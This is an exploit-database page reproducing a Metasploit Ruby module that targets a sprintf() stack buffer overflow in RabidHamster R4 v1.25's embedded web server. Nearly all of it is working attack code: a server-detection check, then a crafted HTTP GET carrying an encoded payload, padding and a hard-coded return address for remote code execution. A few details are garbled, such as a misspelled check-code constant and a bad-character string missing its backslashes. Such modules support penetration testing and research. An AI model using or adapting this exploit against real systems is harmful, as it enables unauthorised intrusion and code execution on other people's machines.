[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : RabidHamster R4 Log Entry sprintf() Buffer Overflow
# Published : 2012-05-25
# Author :
# Previous Title : Tom Sawyer Software GET Extension Factory Remote Code Execution
# Next Title : Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
			'Description'    => %q{
					This module exploits a vulnerability found in RabidHamster R4's web server.
				By supplying a malformed HTTP request, it is possible to trigger a stack-based
				buffer overflow when generating a log, which may result in arbitrary code
				execution under the context of the user.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Luigi Auriemma',  #Discovery, PoC
					'sinn3r'           #Metasploit
				],
			'References'     =>
				[
					['OSVDB', '79007'],
					['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],
					['URL', 'http://secunia.com/advisories/47901/']
				],
			'Payload'        =>
				{
					'StackAdjustment' => -3500,
					'BadChars' => "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx20"
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "process"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['R4 v1.25', {'Ret'=>0x73790533}]  #JMP ESI (ddraw.dll)
				],
			'Privileged'     => false,
			'DisclosureDate' => "Feb 09 2012",
			'DefaultTarget'  => 0))

			register_options(
				[
					OptPort.new('RPORT', [true, 'The remote port', 8888])
				], self.class)
	end

	def check
		res = send_request_cgi({
			'method' => 'GET',
			'uri'    => '/'
		})

		if res and res.headers['Server'] == 'R4 Embedded Server'
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCoded::Safe
		end
	end

	def exploit
		buf = ''
		buf << payload.encoded
		buf << rand_text_alpha(2022-buf.length, payload_badchars)
		buf << [target.ret].pack("V*")
		buf << pattern_create(200)
		buf << rand_text_alpha(3000-buf.length, payload_badchars)

		send_request_cgi({
			'method' => 'GET',
			'uri'    => "/?#{buf}"
		})
	end
end